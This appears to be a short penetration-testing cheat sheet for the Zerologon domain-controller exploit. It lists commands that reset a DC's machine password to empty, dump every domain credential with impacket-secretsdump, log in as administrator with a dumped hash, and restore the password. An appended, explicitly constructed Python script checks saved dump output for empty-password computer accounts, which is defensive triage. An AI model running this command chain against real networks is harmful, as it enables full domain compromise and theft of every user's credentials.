Zerologon exploit
This exploit changes the DC's password to an empty string.
python3 zerologon_tester.py DOMAIN DC_IP
Clone
python3 exploit.py DOMAIN DC_IP
impacket-secretsdump -just-dc DOMAIN/DC_HOSTNAME\$@DC_IP -no-pass
impacket-secretsdump administrator@DC_IP -hashes HASH_FROM_DUMP
Note the plaintext password value, plain_password_hex, in the output; it is the PLAIN_HEX argument in the next command.
python3 restorepassword.py DOMAIN/DC_HOSTNAME@DC_HOSTNAME -target-ip DC_IP -hexpass PLAIN_HEX
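To confirm whether a DC computer account is still in the empty-password state described above (during incident triage, or after the restore step), the following added example scans a saved secretsdump text output for computer accounts whose NT hash is the hash of an empty string. It is not part of the original page or of impacket; the function names, the LAB domain and the sample lines are constructed for illustration.

```python
import re

# NT hash of the empty string; a computer account carrying it has an empty password.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# secretsdump NTDS line format: name:RID:LMhash:NThash:::
ENTRY = re.compile(
    r"^(?P<name>[^:]+):(?P<rid>\d+):[0-9a-fA-F]{32}:(?P<nt>[0-9a-fA-F]{32}):::"
)

# Constructed sample dump (hypothetical LAB domain, made-up non-empty hashes).
SAMPLE = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
LAB\\DC01$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
LAB\\WS07$:1104:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
[*] Cleaning up...
"""


def parse_entries(text):
    """Yield (account, rid, nt_hash) per credential line, skipping status lines."""
    for line in text.splitlines():
        m = ENTRY.match(line.strip())
        if m:
            yield m["name"], int(m["rid"]), m["nt"].lower()


def empty_password_computers(text):
    """Return computer accounts (names ending in '$') with the empty-string NT hash."""
    return [
        name
        for name, _rid, nt in parse_entries(text)
        if name.endswith("$") and nt == EMPTY_NT
    ]


if __name__ == "__main__":
    hits = empty_password_computers(SAMPLE)
    for name in hits:
        print(f"EMPTY PASSWORD: {name}")
    print(f"{len(hits)} computer account(s) with an empty password")
```

An empty result after the restore step indicates that the DC account hash is no longer the empty-password value.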